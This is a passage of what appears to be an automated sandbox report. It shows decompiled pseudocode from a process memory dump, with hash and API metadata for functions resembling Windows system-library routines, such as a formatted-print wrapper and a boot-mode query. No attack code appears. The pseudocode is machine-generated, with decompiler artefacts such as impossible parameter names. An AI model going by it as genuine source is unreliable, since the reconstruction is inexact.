                                                                            									E0112FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                            									goto L12;
                                                                            								}
                                                                            							} else {
                                                                            								L23:
                                                                            								while(1) {
                                                                            									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                            										_t122 =  *_t147;
                                                                            										if(_t159 == 0) {
                                                                            											L32:
                                                                            											if(_t122 == 0) {
                                                                            												L34:
                                                                            												_v68 = 0;
                                                                            												goto L35;
                                                                            											}
                                                                            											L33:
                                                                            											_t147 = _t122;
                                                                            											continue;
                                                                            										}
                                                                            										if(_t122 == 0) {
                                                                            											goto L34;
                                                                            										}
                                                                            										_t122 = _t122 ^ _t147;
                                                                            										goto L32;
                                                                            									}
                                                                            									_t122 =  *(_t147 + 4);
                                                                            									if(_t159 == 0) {
                                                                            										L27:
                                                                            										if(_t122 != 0) {
                                                                            											goto L33;
                                                                            										}
                                                                            										L28:
                                                                            										_v68 = 1;
                                                                            										goto L35;
                                                                            									}
                                                                            									if(_t122 == 0) {
                                                                            										goto L28;
                                                                            									}
                                                                            									_t122 = _t122 ^ _t147;
                                                                            									goto L27;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					_v72 = _v72 & 0x00000000;
                                                                            					goto L11;
                                                                            				}
                                                                            			}




































                                                                            0x0113e735
                                                                            0x0113e73d
                                                                            0x0113e73f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0113e741
                                                                            0x0113e741
                                                                            0x00000000
                                                                            0x0113e741
                                                                            0x0113e739
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0113e73b
                                                                            0x00000000
                                                                            0x0113e73b
                                                                            0x0113e722
                                                                            0x0113e720
                                                                            0x0113e6b0
                                                                            0x0113e618
                                                                            0x00000000
                                                                            0x0113e618

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `$`
                                                                            • API String ID: 0-197956300
                                                                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                            • Instruction ID: d3ad5017c93a25abe0a70127c1a01081a37177a975a3001a4b8100819833a295
                                                                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                            • Instruction Fuzzy Hash: 01919E712057429FE729CF29C841B5BBBE5AFC4714F14892DF699CB284E774E804CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                            			E010F51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                            				signed short* _t63;
                                                                            				signed int _t64;
                                                                            				signed int _t65;
                                                                            				signed int _t67;
                                                                            				intOrPtr _t74;
                                                                            				intOrPtr _t84;
                                                                            				intOrPtr _t88;
                                                                            				intOrPtr _t94;
                                                                            				void* _t100;
                                                                            				void* _t103;
                                                                            				intOrPtr _t105;
                                                                            				signed int _t106;
                                                                            				short* _t108;
                                                                            				signed int _t110;
                                                                            				signed int _t113;
                                                                            				signed int* _t115;
                                                                            				signed short* _t117;
                                                                            				void* _t118;
                                                                            				void* _t119;
                                                                            
                                                                            				_push(0x80);
                                                                            				_push(0x11505f0);
                                                                            				E010CD0E8(__ebx, __edi, __esi);
                                                                            				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                            				_t115 =  *(_t118 + 0xc);
                                                                            				 *(_t118 - 0x7c) = _t115;
                                                                            				 *((char*)(_t118 - 0x65)) = 0;
                                                                            				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                            				_t113 = 0;
                                                                            				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                            				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                            				_t100 = __ecx;
                                                                            				if(_t100 == 0) {
                                                                            					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                            					E0108EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                            					 *((char*)(_t118 - 0x65)) = 1;
                                                                            					_t63 =  *(_t118 - 0x90);
                                                                            					_t101 = _t63[2];
                                                                            					_t64 =  *_t63 & 0x0000ffff;
                                                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                            					L20:
                                                                            					_t65 = _t64 >> 1;
                                                                            					L21:
                                                                            					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                            					if(_t108 == 0) {
                                                                            						L27:
                                                                            						 *_t115 = _t65 + 1;
                                                                            						_t67 = 0xc0000023;
                                                                            						L28:
                                                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                            						L29:
                                                                            						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                            						E010F53CA(0);
                                                                            						return E010CD130(0, _t113, _t115);
                                                                            					}
                                                                            					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                            						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                            							 *_t108 = 0;
                                                                            						}
                                                                            						goto L27;
                                                                            					}
                                                                            					 *_t115 = _t65;
                                                                            					_t115 = _t65 + _t65;
                                                                            					E010BF3E0(_t108, _t101, _t115);
                                                                            					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                            					_t67 = 0;
                                                                            					goto L28;
                                                                            				}
                                                                            				_t103 = _t100 - 1;
                                                                            				if(_t103 == 0) {
                                                                            					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                            					_t74 = E01093690(1, _t117, 0x1051810, _t118 - 0x74);
                                                                            					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                            					_t101 = _t117[2];
                                                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                            					if(_t74 < 0) {
                                                                            						_t64 =  *_t117 & 0x0000ffff;
                                                                            						_t115 =  *(_t118 - 0x7c);
                                                                            						goto L20;
                                                                            					}
                                                                            					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                            					_t115 =  *(_t118 - 0x7c);
                                                                            					goto L21;
                                                                            				}
                                                                            				if(_t103 == 1) {
                                                                            					_t105 = 4;
                                                                            					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                            					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                            					_push(_t118 - 0x70);
                                                                            					_push(0);
                                                                            					_push(0);
                                                                            					_push(_t105);
                                                                            					_push(_t118 - 0x78);
                                                                            					_push(0x6b);
                                                                            					 *((intOrPtr*)(_t118 - 0x64)) = E010BAA90();
                                                                            					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                            					_t113 = L01094620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                            					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                            					if(_t113 != 0) {
                                                                            						_push(_t118 - 0x70);
                                                                            						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                            						_push(_t113);
                                                                            						_push(4);
                                                                            						_push(_t118 - 0x78);
                                                                            						_push(0x6b);
                                                                            						_t84 = E010BAA90();
                                                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                            						if(_t84 < 0) {
                                                                            							goto L29;
                                                                            						}
                                                                            						_t110 = 0;
                                                                            						_t106 = 0;
                                                                            						while(1) {
                                                                            							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                            							 *(_t118 - 0x88) = _t106;
                                                                            							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                            								break;
                                                                            							}
                                                                            							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                            							_t106 = _t106 + 1;
                                                                            						}
                                                                            						_t88 = E010F500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                            						_t119 = _t119 + 0x1c;
                                                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                            						if(_t88 < 0) {
                                                                            							goto L29;
                                                                            						}
                                                                            						_t101 = _t118 - 0x3c;
                                                                            						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                            						goto L21;
                                                                            					}
                                                                            					_t67 = 0xc0000017;
                                                                            					goto L28;
                                                                            				}
                                                                            				_push(0);
                                                                            				_push(0x20);
                                                                            				_push(_t118 - 0x60);
                                                                            				_push(0x5a);
                                                                            				_t94 = E010B9860();
                                                                            				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                            				if(_t94 < 0) {
                                                                            					goto L29;
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                            					_t101 = L"Legacy";
                                                                            					_push(6);
                                                                            				} else {
                                                                            					_t101 = L"UEFI";
                                                                            					_push(4);
                                                                            				}
                                                                            				_pop(_t65);
                                                                            				goto L21;
                                                                            			}


                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Legacy$UEFI
                                                                            • API String ID: 2994545307-634100481
                                                                            • Opcode ID: 7ba92979a222a4ce0a8e3fa57a2f9592d8e127d9d5dfc6dea3d2e670de7779b2
                                                                            • Instruction ID: a80d9201eabc8b004bae3f22c98536c6d866db90c4e3672e3c76ea36a94d44ba
                                                                            • Opcode Fuzzy Hash: 7ba92979a222a4ce0a8e3fa57a2f9592d8e127d9d5dfc6dea3d2e670de7779b2
                                                                            • Instruction Fuzzy Hash: 2A516071A006099FDB64DFA8CD81BAEBBF8FF48700F14806DE689EB651D7719900CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
                                                                            			E0109B944(signed int* __ecx, char __edx) {
                                                                            				signed int _v8;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				char _v28;
                                                                            				signed int _v32;
                                                                            				char _v36;
                                                                            				signed int _v40;
                                                                            				intOrPtr _v44;
                                                                            				signed int* _v48;
                                                                            				signed int _v52;
                                                                            				signed int _v56;
                                                                            				intOrPtr _v60;
                                                                            				intOrPtr _v64;
                                                                            				intOrPtr _v68;
                                                                            				intOrPtr _v72;
                                                                            				intOrPtr _v76;
                                                                            				char _v77;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				intOrPtr* _t65;
                                                                            				intOrPtr _t67;
                                                                            				intOrPtr _t68;
                                                                            				char* _t73;
                                                                            				intOrPtr _t77;
                                                                            				intOrPtr _t78;
                                                                            				signed int _t82;
                                                                            				intOrPtr _t83;
                                                                            				void* _t87;
                                                                            				char _t88;
                                                                            				intOrPtr* _t89;
                                                                            				intOrPtr _t91;
                                                                            				void* _t97;
                                                                            				intOrPtr _t100;
                                                                            				void* _t102;
                                                                            				void* _t107;
                                                                            				signed int _t108;
                                                                            				intOrPtr* _t112;
                                                                            				void* _t113;
                                                                            				intOrPtr* _t114;
                                                                            				intOrPtr _t115;
                                                                            				intOrPtr _t116;
                                                                            				intOrPtr _t117;
                                                                            				signed int _t118;
                                                                            				void* _t130;
                                                                            
                                                                            				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                            				_v8 =  *0x116d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                            				_t112 = __ecx;
                                                                            				_v77 = __edx;
                                                                            				_v48 = __ecx;
                                                                            				_v28 = 0;
                                                                            				_t5 = _t112 + 0xc; // 0x575651ff
                                                                            				_t105 =  *_t5;
                                                                            				_v20 = 0;
                                                                            				_v16 = 0;
                                                                            				if(_t105 == 0) {
                                                                            					_t50 = _t112 + 4; // 0x5de58b5b
                                                                            					_t60 =  *__ecx |  *_t50;
                                                                            					if(( *__ecx |  *_t50) != 0) {
                                                                            						 *__ecx = 0;
                                                                            						__ecx[1] = 0;
                                                                            						if(E01097D50() != 0) {
                                                                            							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                            						} else {
                                                                            							_t65 = 0x7ffe0386;
                                                                            						}
                                                                            						if( *_t65 != 0) {
                                                                            							E01148CD6(_t112);
                                                                            						}
                                                                            						_push(0);
                                                                            						_t52 = _t112 + 0x10; // 0x778df98b
                                                                            						_push( *_t52);
                                                                            						_t60 = E010B9E20();
                                                                            					}
                                                                            					L20:
                                                                            					_pop(_t107);
                                                                            					_pop(_t113);
                                                                            					_pop(_t87);
                                                                            					return E010BB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                            				}
                                                                            				_t8 = _t112 + 8; // 0x8b000cc2
                                                                            				_t67 =  *_t8;
                                                                            				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                            				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                            				_t108 =  *(_t67 + 0x14);
                                                                            				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                            				_t105 = 0x2710;
                                                                            				asm("sbb eax, edi");
                                                                            				_v44 = _t88;
                                                                            				_v52 = _t108;
                                                                            				_t60 = E010BCE00(_t97, _t68, 0x2710, 0);
                                                                            				_v56 = _t60;
                                                                            				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                            					L3:
                                                                            					 *(_t112 + 0x44) = _t60;
                                                                            					_t105 = _t60 * 0x2710 >> 0x20;
                                                                            					 *_t112 = _t88;
                                                                            					 *(_t112 + 4) = _t108;
                                                                            					_v20 = _t60 * 0x2710;
                                                                            					_v16 = _t60 * 0x2710 >> 0x20;
                                                                            					if(_v77 != 0) {
                                                                            						L16:
                                                                            						_v36 = _t88;
                                                                            						_v32 = _t108;
                                                                            						if(E01097D50() != 0) {
                                                                            							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                            						} else {
                                                                            							_t73 = 0x7ffe0386;
                                                                            						}
                                                                            						if( *_t73 != 0) {
                                                                            							_t105 = _v40;
                                                                            							E01148F6A(_t112, _v40, _t88, _t108);
                                                                            						}
                                                                            						_push( &_v28);
                                                                            						_push(0);
                                                                            						_push( &_v36);
                                                                            						_t48 = _t112 + 0x10; // 0x778df98b
                                                                            						_push( *_t48);
                                                                            						_t60 = E010BAF60();
                                                                            						goto L20;
                                                                            					} else {
                                                                            						_t89 = 0x7ffe03b0;
                                                                            						do {
                                                                            							_t114 = 0x7ffe0010;
                                                                            							do {
                                                                            								_t77 =  *0x1168628; // 0x0
                                                                            								_v68 = _t77;
                                                                            								_t78 =  *0x116862c; // 0x0
                                                                            								_v64 = _t78;
                                                                            								_v72 =  *_t89;
                                                                            								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                            								while(1) {
                                                                            									_t105 =  *0x7ffe000c;
                                                                            									_t100 =  *0x7ffe0008;
                                                                            									if(_t105 ==  *_t114) {
                                                                            										goto L8;
                                                                            									}
                                                                            									asm("pause");
                                                                            								}
                                                                            								L8:
                                                                            								_t89 = 0x7ffe03b0;
                                                                            								_t115 =  *0x7ffe03b0;
                                                                            								_t82 =  *0x7FFE03B4;
                                                                            								_v60 = _t115;
                                                                            								_t114 = 0x7ffe0010;
                                                                            								_v56 = _t82;
                                                                            							} while (_v72 != _t115 || _v76 != _t82);
                                                                            							_t83 =  *0x1168628; // 0x0
                                                                            							_t116 =  *0x116862c; // 0x0
                                                                            							_v76 = _t116;
                                                                            							_t117 = _v68;
                                                                            						} while (_t117 != _t83 || _v64 != _v76);
                                                                            						asm("sbb edx, [esp+0x24]");
                                                                            						_t102 = _t100 - _v60 - _t117;
                                                                            						_t112 = _v48;
                                                                            						_t91 = _v44;
                                                                            						asm("sbb edx, eax");
                                                                            						_t130 = _t105 - _v52;
                                                                            						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                            							_t88 = _t102 - _t91;
                                                                            							asm("sbb edx, edi");
                                                                            							_t108 = _t105;
                                                                            						} else {
                                                                            							_t88 = 0;
                                                                            							_t108 = 0;
                                                                            						}
                                                                            						goto L16;
                                                                            					}
                                                                            				} else {
                                                                            					if( *(_t112 + 0x44) == _t60) {
                                                                            						goto L20;
                                                                            					}
                                                                            					goto L3;
                                                                            				}
                                                                            			}

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0109B9A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID:
                                                                            • API String ID: 885266447-0
                                                                            • Opcode ID: e9d5aae6446c0b2e68a154bdce783c603c92322001f4c0b8788e9320f9f2a4d5
                                                                            • Instruction ID: 9179bb82f858ae31d3aa179d6a407943956b27141fe29fdd5005d42506247760
                                                                            • Opcode Fuzzy Hash: e9d5aae6446c0b2e68a154bdce783c603c92322001f4c0b8788e9320f9f2a4d5
                                                                            • Instruction Fuzzy Hash: 33516871A08301CFCB24DF6DD0A092ABBE5FB88620F1489AEF6D587355D771E840DB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 78%
                                                                            			E0107B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                            				signed int _t65;
                                                                            				signed short _t69;
                                                                            				intOrPtr _t70;
                                                                            				signed short _t85;
                                                                            				void* _t86;
                                                                            				signed short _t89;
                                                                            				signed short _t91;
                                                                            				intOrPtr _t92;
                                                                            				intOrPtr _t97;
                                                                            				intOrPtr* _t98;
                                                                            				signed short _t99;
                                                                            				signed short _t101;
                                                                            				void* _t102;
                                                                            				char* _t103;
                                                                            				signed short _t104;
                                                                            				intOrPtr* _t110;
                                                                            				void* _t111;
                                                                            				void* _t114;
                                                                            				intOrPtr* _t115;
                                                                            
                                                                            				_t109 = __esi;
                                                                            				_t108 = __edi;
                                                                            				_t106 = __edx;
                                                                            				_t95 = __ebx;
                                                                            				_push(0x90);
                                                                            				_push(0x114f7a8);
                                                                            				E010CD0E8(__ebx, __edi, __esi);
                                                                            				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                            				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                            				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                            				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                            				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                            				if(__edx == 0xffffffff) {
                                                                            					L6:
                                                                            					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                            					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                            					__eflags = _t65 & 0x00000002;
                                                                            					if((_t65 & 0x00000002) != 0) {
                                                                            						L3:
                                                                            						L4:
                                                                            						return E010CD130(_t95, _t108, _t109);
                                                                            					}
                                                                            					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                            					_t108 = 0;
                                                                            					_t109 = 0;
                                                                            					_t95 = 0;
                                                                            					__eflags = 0;
                                                                            					while(1) {
                                                                            						__eflags = _t95 - 0x200;
                                                                            						if(_t95 >= 0x200) {
                                                                            							break;
                                                                            						}
                                                                            						E010BD000(0x80);
                                                                            						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                            						_t108 = _t115;
                                                                            						_t95 = _t95 - 0xffffff80;
                                                                            						_t17 = _t114 - 4;
                                                                            						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                            						__eflags =  *_t17;
                                                                            						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                            						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                            						_t102 = _t110 + 1;
                                                                            						do {
                                                                            							_t85 =  *_t110;
                                                                            							_t110 = _t110 + 1;
                                                                            							__eflags = _t85;
                                                                            						} while (_t85 != 0);
                                                                            						_t111 = _t110 - _t102;
                                                                            						_t21 = _t95 - 1; // -129
                                                                            						_t86 = _t21;
                                                                            						__eflags = _t111 - _t86;
                                                                            						if(_t111 > _t86) {
                                                                            							_t111 = _t86;
                                                                            						}
                                                                            						E010BF3E0(_t108, _t106, _t111);
                                                                            						_t115 = _t115 + 0xc;
                                                                            						_t103 = _t111 + _t108;
                                                                            						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                            						_t89 = _t95 - _t111;
                                                                            						__eflags = _t89;
                                                                            						_push(0);
                                                                            						if(_t89 == 0) {
                                                                            							L15:
                                                                            							_t109 = 0xc000000d;
                                                                            							goto L16;
                                                                            						} else {
                                                                            							__eflags = _t89 - 0x7fffffff;
                                                                            							if(_t89 <= 0x7fffffff) {
                                                                            								L16:
                                                                            								 *(_t114 - 0x94) = _t109;
                                                                            								__eflags = _t109;
                                                                            								if(_t109 < 0) {
                                                                            									__eflags = _t89;
                                                                            									if(_t89 != 0) {
                                                                            										 *_t103 = 0;
                                                                            									}
                                                                            									L26:
                                                                            									 *(_t114 - 0xa0) = _t109;
                                                                            									 *(_t114 - 4) = 0xfffffffe;
                                                                            									__eflags = _t109;
                                                                            									if(_t109 >= 0) {
                                                                            										L31:
                                                                            										_t98 = _t108;
                                                                            										_t39 = _t98 + 1; // 0x1
                                                                            										_t106 = _t39;
                                                                            										do {
                                                                            											_t69 =  *_t98;
                                                                            											_t98 = _t98 + 1;
                                                                            											__eflags = _t69;
                                                                            										} while (_t69 != 0);
                                                                            										_t99 = _t98 - _t106;
                                                                            										__eflags = _t99;
                                                                            										L34:
                                                                            										_t70 =  *[fs:0x30];
                                                                            										__eflags =  *((char*)(_t70 + 2));
                                                                            										if( *((char*)(_t70 + 2)) != 0) {
                                                                            											L40:
                                                                            											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                            											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                            											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                            											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                            											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                            											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                            											 *(_t114 - 4) = 1;
                                                                            											_push(_t114 - 0x74);
                                                                            											L010CDEF0(_t99, _t106);
                                                                            											 *(_t114 - 4) = 0xfffffffe;
                                                                            											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                            											goto L3;
                                                                            										}
                                                                            										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                            										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                            											goto L40;
                                                                            										}
                                                                            										_push( *((intOrPtr*)(_t114 + 8)));
                                                                            										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                            										_push(_t99 & 0x0000ffff);
                                                                            										_push(_t108);
                                                                            										_push(1);
                                                                            										_t101 = E010BB280();
                                                                            										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                            										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                            											__eflags = _t101 - 0x80000003;
                                                                            											if(_t101 == 0x80000003) {
                                                                            												E010BB7E0(1);
                                                                            												_t101 = 0;
                                                                            												__eflags = 0;
                                                                            											}
                                                                            										}
                                                                            										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                            										goto L4;
                                                                            									}
                                                                            									__eflags = _t109 - 0x80000005;
                                                                            									if(_t109 == 0x80000005) {
                                                                            										continue;
                                                                            									}
                                                                            									break;
                                                                            								}
                                                                            								 *(_t114 - 0x90) = 0;
                                                                            								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                            								_t91 = E010BE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                            								_t115 = _t115 + 0x10;
                                                                            								_t104 = _t91;
                                                                            								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                            								__eflags = _t104;
                                                                            								if(_t104 < 0) {
                                                                            									L21:
                                                                            									_t109 = 0x80000005;
                                                                            									 *(_t114 - 0x90) = 0x80000005;
                                                                            									L22:
                                                                            									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                            									L23:
                                                                            									 *(_t114 - 0x94) = _t109;
                                                                            									goto L26;
                                                                            								}
                                                                            								__eflags = _t104 - _t92;
                                                                            								if(__eflags > 0) {
                                                                            									goto L21;
                                                                            								}
                                                                            								if(__eflags == 0) {
                                                                            									goto L22;
                                                                            								}
                                                                            								goto L23;
                                                                            							}
                                                                            							goto L15;
                                                                            						}
                                                                            					}
                                                                            					__eflags = _t109;
                                                                            					if(_t109 >= 0) {
                                                                            						goto L31;
                                                                            					}
                                                                            					__eflags = _t109 - 0x80000005;
                                                                            					if(_t109 != 0x80000005) {
                                                                            						goto L31;
                                                                            					}
                                                                            					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                            					_t38 = _t95 - 1; // -129
                                                                            					_t99 = _t38;
                                                                            					goto L34;
                                                                            				}
                                                                            				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                            					__eflags = __edx - 0x65;
                                                                            					if(__edx != 0x65) {
                                                                            						goto L2;
                                                                            					}
                                                                            					goto L6;
                                                                            				}
                                                                            				L2:
                                                                            				_push( *((intOrPtr*)(_t114 + 8)));
                                                                            				_push(_t106);
                                                                            				if(E010BA890() != 0) {
                                                                            					goto L6;
                                                                            				}
                                                                            				goto L3;
                                                                            			}






















                                                                            0x010d4991
                                                                            0x010d4993
                                                                            0x010d4999
                                                                            0x010d499d
                                                                            0x010d49a2
                                                                            0x010d49a2
                                                                            0x010d49a2
                                                                            0x010d4999
                                                                            0x010d49ac
                                                                            0x00000000
                                                                            0x010d49b3
                                                                            0x010d48f8
                                                                            0x010d48fe
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d48fe
                                                                            0x010d4895
                                                                            0x010d489c
                                                                            0x010d48ad
                                                                            0x010d48b2
                                                                            0x010d48b5
                                                                            0x010d48b7
                                                                            0x010d48ba
                                                                            0x010d48bc
                                                                            0x010d48c6
                                                                            0x010d48c6
                                                                            0x010d48cb
                                                                            0x010d48d1
                                                                            0x010d48d4
                                                                            0x010d48d8
                                                                            0x010d48d8
                                                                            0x00000000
                                                                            0x010d48d8
                                                                            0x010d48be
                                                                            0x010d48c0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d48c2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d48c4
                                                                            0x00000000
                                                                            0x010d4882
                                                                            0x010d487b
                                                                            0x010d4904
                                                                            0x010d4906
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d4908
                                                                            0x010d490e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d4910
                                                                            0x010d4917
                                                                            0x010d4917
                                                                            0x00000000
                                                                            0x010d4917
                                                                            0x0107b1ba
                                                                            0x010d47f9
                                                                            0x010d47fc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d47fc
                                                                            0x0107b1c0
                                                                            0x0107b1c0
                                                                            0x0107b1c3
                                                                            0x0107b1cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _vswprintf_s
                                                                            • String ID:
                                                                            • API String ID: 677850445-0
                                                                            • Opcode ID: 367230264c3a824e1df4b87f0d80adb3a58f6e84d03397d42955f2a990fe7146
                                                                            • Instruction ID: a0e417247003bbfb3778049f734cde2843a2f0cab2b88eb38d57b72046988c9c
                                                                            • Opcode Fuzzy Hash: 367230264c3a824e1df4b87f0d80adb3a58f6e84d03397d42955f2a990fe7146
                                                                            • Instruction Fuzzy Hash: 6451BF71D003598EDB25CF68C885BAEBBF0AF04750F1441A9E899EBA82D7714945CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                            			E010A2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200326, char _a1546912006) {
                                                                            				signed int _v8;
                                                                            				signed int _v16;
                                                                            				unsigned int _v24;
                                                                            				void* _v28;
                                                                            				signed int _v32;
                                                                            				unsigned int _v36;
                                                                            				signed int _v37;
                                                                            				signed int _v40;
                                                                            				signed int _v44;
                                                                            				signed int _v48;
                                                                            				signed int _v52;
                                                                            				signed int _v56;
                                                                            				intOrPtr _v60;
                                                                            				signed int _v64;
                                                                            				signed int _v68;
                                                                            				signed int _v72;
                                                                            				signed int _v76;
                                                                            				signed int _v80;
                                                                            				signed int _t237;
                                                                            				signed char _t241;
                                                                            				signed char _t245;
                                                                            				signed int _t251;
                                                                            				signed int _t253;
                                                                            				intOrPtr _t255;
                                                                            				signed int _t258;
                                                                            				signed int _t265;
